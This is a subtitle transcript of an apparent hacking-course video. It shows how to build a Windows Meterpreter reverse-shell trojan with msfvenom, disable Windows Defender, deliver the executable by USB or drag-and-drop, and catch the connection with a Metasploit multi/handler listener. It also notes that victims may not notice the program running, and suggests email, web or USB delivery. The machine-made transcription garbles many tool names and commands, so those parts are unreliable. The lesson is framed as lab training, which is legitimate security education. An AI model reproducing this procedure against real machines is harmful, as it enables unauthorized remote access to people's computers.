1
00:00:00,240 --> 00:00:06,000
OK, it is time we see how we can gain access to the secured systems.

2
00:00:07,090 --> 00:00:12,250
In the previous few videos we talked about and we attacked machines that had some vulnerability inside

3
00:00:12,250 --> 00:00:18,190
of them, whether it was the operating system vulnerability and outdated software or weak credentials,

4
00:00:18,620 --> 00:00:22,910
we managed to exploit then through those vulnerabilities and gain access to them.

5
00:00:23,620 --> 00:00:29,510
But now let's see what happens if our target does not have any known vulnerability.

6
00:00:29,950 --> 00:00:30,910
What now?

7
00:00:31,750 --> 00:00:36,660
Well, remember I told you that the process of attacking is rather the same in this case.

8
00:00:37,210 --> 00:00:44,260
We want to deliver the payload to the target and execute it just while the target had a vulnerability.

9
00:00:44,510 --> 00:00:48,370
We did this through an exploit and through that vulnerability.

10
00:00:48,370 --> 00:00:50,890
We managed to execute the payload ourselves.

11
00:00:51,820 --> 00:00:53,800
Now it becomes harder.

12
00:00:54,400 --> 00:01:01,480
We must deliver the payload to the target using some other method, and the target has to execute the

13
00:01:01,480 --> 00:01:02,730
payload themselves.

14
00:01:03,310 --> 00:01:04,570
That is the hard part.

15
00:01:05,260 --> 00:01:11,460
The way you deliver the payload is completely up to you, whether it is over an email or over some HTTP

16
00:01:11,470 --> 00:01:13,400
page over a USB drive.

17
00:01:13,420 --> 00:01:14,410
It doesn't matter.

18
00:01:15,250 --> 00:01:20,920
What matters is that the payload ends up on their machine and they double click and run it.

19
00:01:21,910 --> 00:01:28,950
For now, let us focus on just creating the payload and running it to see if it works for this hobbyist

20
00:01:28,960 --> 00:01:34,610
clinic's machine to create the payload, and I will execute it on my main Winterstein machine.

21
00:01:35,290 --> 00:01:40,540
You can run our payloads on the Windows 10 machine that we installed in the previous section, or you

22
00:01:40,540 --> 00:01:42,970
can use any other Windows machine whatsoever.

23
00:01:42,980 --> 00:01:44,760
It doesn't even have to be Windows 10.

24
00:01:45,040 --> 00:01:46,500
It is completely up to you.

25
00:01:47,050 --> 00:01:53,710
Just one thing that we must make sure is that Windows defender and antivirus software are turned off.

26
00:01:54,640 --> 00:01:55,030
Why?

27
00:01:55,540 --> 00:02:02,080
Well, we're going to be creating a payload using MSF when I'm told from the mental framework, and

28
00:02:02,080 --> 00:02:08,200
since many people use the exact same tool to create the exact same payload as we will right now, those

29
00:02:08,200 --> 00:02:13,720
payloads are well known to every antivirus software and they will get detected quickly.

30
00:02:14,350 --> 00:02:19,930
However, for now, our goal is not to bypass antivirus, but to just create a payload and get it to

31
00:02:19,930 --> 00:02:20,290
work.

32
00:02:20,890 --> 00:02:24,590
So turn off your Windows defender and I will do it right here as well.

33
00:02:24,850 --> 00:02:31,120
You can go to this through the Windows Defender, and the one thing that you want to turn off is under

34
00:02:31,120 --> 00:02:32,950
this virus and threat protection.

35
00:02:33,250 --> 00:02:38,590
We want to go to the magnet settings and thurn of the real time protection.

36
00:02:39,280 --> 00:02:44,470
It will ask you for the administrator password and once you type it in, it will turn off the real time

37
00:02:44,470 --> 00:02:46,780
protection, as it says right here.

38
00:02:47,880 --> 00:02:55,230
So I will close this and now let's create our very first Trojan, as I said, for this will be using

39
00:02:55,230 --> 00:02:56,940
a tool called MSF.

40
00:02:57,720 --> 00:02:59,700
So I'll open a terminal right here.

41
00:03:00,540 --> 00:03:01,680
Why we are using MSF?

42
00:03:02,100 --> 00:03:07,740
Well, it is a known tool and it is used to generate payloads really fast in just one command.

43
00:03:08,010 --> 00:03:13,100
We will be able to generate a program that will gain us and access to the target system.

44
00:03:13,500 --> 00:03:20,850
So let us see how we can create a simple one first if I type the command MSF when I'm their age.

45
00:03:22,000 --> 00:03:29,650
Right here, we are going to see our available options with the MSF, Wynnum and up here, we also get

46
00:03:29,650 --> 00:03:36,670
examples of usage, which tells us how we can generate a simple payload right here.

47
00:03:37,660 --> 00:03:40,320
Let's follow the example and try it out now.

48
00:03:40,390 --> 00:03:46,810
It tells us right here that to run the MSF one, we need to specify the entire path right here, but

49
00:03:46,810 --> 00:03:54,280
instead we can just specify MSF when it will still recognize it as the tool that we need.

50
00:03:54,430 --> 00:04:01,560
And we can write our options right after it, let and clear the screen so we can see the command better.

51
00:04:01,810 --> 00:04:10,040
And if I go and type MSF when we want to use the dash P option and this option stands for payload.

52
00:04:10,060 --> 00:04:13,180
So here we specify which type of payload are we creating.

53
00:04:13,540 --> 00:04:20,290
In my case, since I'm going to be attacking this 10 64 bit machine I want to generate of windows.

54
00:04:21,760 --> 00:04:24,790
Sixty four interpretor

55
00:04:27,520 --> 00:04:35,740
reverse DCPI payload, I'm using a 64 bit because my machine is a 64 bit machine and I'm using a reverse

56
00:04:35,740 --> 00:04:36,460
shell connection.

57
00:04:37,260 --> 00:04:44,170
Another option that we must specify is the outpost and the host is the IP address of your machine.

58
00:04:44,770 --> 00:04:52,120
So we can add to that 168, that one that well, in my case I will just double check it to 2.5 config

59
00:04:52,630 --> 00:04:53,020
test.

60
00:04:53,020 --> 00:04:54,610
One, two, three, four is my password.

61
00:04:54,610 --> 00:04:55,630
And here it is.

62
00:04:55,810 --> 00:04:57,190
The IP address is correct.

63
00:04:59,270 --> 00:05:05,990
Great, another option to specify is the local port and by the way, this whole stands for localhost,

64
00:05:05,990 --> 00:05:07,280
not sure if I mentioned it.

65
00:05:07,670 --> 00:05:10,990
And the local port is the port that the target will connect to.

66
00:05:11,120 --> 00:05:13,400
In our case, we can set that to be any port.

67
00:05:13,400 --> 00:05:16,640
That one, for example, let's use the five five five five.

68
00:05:17,980 --> 00:05:23,770
After that, we can use the dash F option to specify the type that we want to create.

69
00:05:24,250 --> 00:05:30,390
So since we are attacking a Windows machine in this video, I'm going to be creating an XY file.

70
00:05:30,550 --> 00:05:32,980
So I just type Dash F and then XY.

71
00:05:33,400 --> 00:05:40,840
And the last option that I want to specify is Dash O and this dash O stands for output here.

72
00:05:40,840 --> 00:05:42,250
We specified the name of the file.

73
00:05:42,850 --> 00:05:44,920
I'll just call it Shell Dot.

74
00:05:46,420 --> 00:05:48,500
This is all we will specify for now.

75
00:05:48,820 --> 00:05:53,060
So once again, we are creating a 64 bit payload for the Windows target.

76
00:05:53,560 --> 00:05:58,510
We said the localhost, which will be written inside the payload so the target can connect to our killing

77
00:05:58,630 --> 00:05:59,070
machine.

78
00:05:59,290 --> 00:06:03,520
And we also specify local port to which the target will connect to.

79
00:06:04,060 --> 00:06:09,970
After that, we mentioned that the file type will be DOT XY, which is an executable for windows, and

80
00:06:09,970 --> 00:06:16,060
at the end we output all of this with a name or shall dot the let's press enter.

81
00:06:18,380 --> 00:06:23,810
And here it is, our payload is right here on our clinic's desktop.

82
00:06:24,710 --> 00:06:27,350
Here we can sit shell that EXI.

83
00:06:28,630 --> 00:06:34,360
This program, once executed on the target machine, will grant us an access and give us the interpreter

84
00:06:34,360 --> 00:06:35,880
shell on that machine.

85
00:06:37,040 --> 00:06:41,960
Let's move it real quick to the target machine, and this is something that you can do however you want.

86
00:06:43,340 --> 00:06:50,150
You can plug in the USB device by going in clinics, then on the devices, then USB and select the USB

87
00:06:50,150 --> 00:06:55,670
device right here, then you will transfer it to the USB device and from the USB device, you will transfer

88
00:06:55,670 --> 00:06:57,620
it to your target Windows machine.

89
00:06:58,550 --> 00:07:00,920
Or you can also go to the devices.

90
00:07:02,010 --> 00:07:08,310
Click on drag and drop and set to be directional, this simply means that you can just copy the fall

91
00:07:08,850 --> 00:07:14,840
from the Linux desktop and paste it or just drag it to the Windows 10 desktop.

92
00:07:14,850 --> 00:07:18,730
In my case, in case you're using another virtual machine that you're attacking.

93
00:07:18,930 --> 00:07:24,210
You can just keep first to remain machine desktop and then from the main machine desktop Cupitt to the

94
00:07:24,210 --> 00:07:25,700
desktop of your virtual machine.

95
00:07:26,070 --> 00:07:28,340
Just make sure it's in the target virtual machine.

96
00:07:28,350 --> 00:07:31,080
You also set the drag and drop to bidirectional.

97
00:07:32,210 --> 00:07:36,860
Great, now we got our shelter or our payload on the target machine.

98
00:07:37,610 --> 00:07:39,710
Great, but we are not done yet.

99
00:07:40,100 --> 00:07:45,620
Remember that this shell will attempt to connect to our killing machine once executed, since it is

100
00:07:45,620 --> 00:07:52,870
a reversal and it will connect on the Port five five five five in order for connection to be established,

101
00:07:52,970 --> 00:07:59,180
we must be listening on the court and have it open in order for Target to even be able to connect back

102
00:07:59,180 --> 00:07:59,670
to us.

103
00:08:00,500 --> 00:08:05,420
This is something that the framework manually configured for us once we performed our exploitation of

104
00:08:05,420 --> 00:08:06,160
a vulnerability.

105
00:08:06,530 --> 00:08:12,330
But right now we must do it manually and we can do it with the help of MSF counsel as well.

106
00:08:13,040 --> 00:08:17,120
So what I'm going to do is I'm going to start the MSF council.

107
00:08:19,260 --> 00:08:26,040
And once it opens up, I want to type, use, exploit multi and then Kendler.

108
00:08:27,220 --> 00:08:33,010
And this is not an actual expert, you can imagine this as something that will listen for the incoming

109
00:08:33,010 --> 00:08:34,860
connection from our payload.

110
00:08:35,440 --> 00:08:37,460
It is also called a listener.

111
00:08:38,140 --> 00:08:39,190
So let's set it up.

112
00:08:39,190 --> 00:08:42,610
If I clear the screen to see it better and type show options.

113
00:08:43,460 --> 00:08:46,990
There is only one thing that we need to set, and that is the payload.

114
00:08:47,320 --> 00:08:52,240
So the payload in this bracket must match the payload that the target will execute.

115
00:08:53,210 --> 00:09:05,860
So let's change set payload to Windows X 64 interpretor and then reverse DCP show options once again

116
00:09:06,470 --> 00:09:11,350
and we must set the host and outport to match from the NSF one command.

117
00:09:11,360 --> 00:09:18,410
So set elbows to be the IP address of my care Linux machine, which is not one that 12 and set the airport

118
00:09:18,410 --> 00:09:24,440
to be five five five five once we set up all of these settings if we can run it.

119
00:09:24,470 --> 00:09:25,520
So I just type front.

120
00:09:26,760 --> 00:09:32,290
We can see it is now listening for the connections and nothing else is really happening right here.

121
00:09:32,970 --> 00:09:33,360
Why?

122
00:09:33,750 --> 00:09:38,220
Well, because the shell on the target system hasn't been run yet.

123
00:09:38,610 --> 00:09:40,650
So let's run it on Windows machine.

124
00:09:43,340 --> 00:09:50,120
And you will see nothing is opening, but if I go back to my Linux machine, here it is, here is our

125
00:09:50,120 --> 00:09:50,660
interpreter.

126
00:09:50,660 --> 00:09:57,050
Session opened and it is identical to the ones that we had during our vulnerability exploitation section.

127
00:09:57,470 --> 00:10:03,440
Just this time, we created and delivered it manually and we also manually set up our listener.

128
00:10:04,350 --> 00:10:10,710
Keep in mind that this didn't explode and vulnerability, we are just relying on the mistake from the

129
00:10:10,710 --> 00:10:14,420
other person that is using target machine to execute our fault.

130
00:10:15,070 --> 00:10:19,750
Otherwise, if the file doesn't get executed, we don't get access to their machine.

131
00:10:20,370 --> 00:10:26,610
And another thing to keep in mind is that Lisner, or in our case, this multi handler that we have

132
00:10:27,420 --> 00:10:33,570
must be ran before the payload or before this shelter, which is kind of logical sense.

133
00:10:33,570 --> 00:10:39,150
If the target runs our file and we weren't listening for the connection, then they won't be able to

134
00:10:39,150 --> 00:10:40,480
connect to our machine.

135
00:10:41,340 --> 00:10:45,800
You can also notice on Target's desktop, once again, nothing is really happening.

136
00:10:45,990 --> 00:10:51,480
So they might think that the program they executed didn't work and they won't question it that much.

137
00:10:52,570 --> 00:10:58,150
But of course, we got the connection right here and we can use all of the comments that the interpreter

138
00:10:58,150 --> 00:11:03,250
gives us, if we can, as usual, enter a shell type, who am I?

139
00:11:04,000 --> 00:11:07,960
Typically config and all the other commands that we can execute.

140
00:11:08,350 --> 00:11:11,550
Type there to check out all of the available files on the desktop.

141
00:11:12,130 --> 00:11:19,150
And if I exit this exit out of the shell since we successfully gained access to it once again.

142
00:11:19,720 --> 00:11:22,960
But keep in mind that, of course, this was just the basic example.

143
00:11:23,080 --> 00:11:29,770
And we will see in the next few videos how to create a little bit more complex payloads see in the next

144
00:11:29,770 --> 00:11:30,070
video.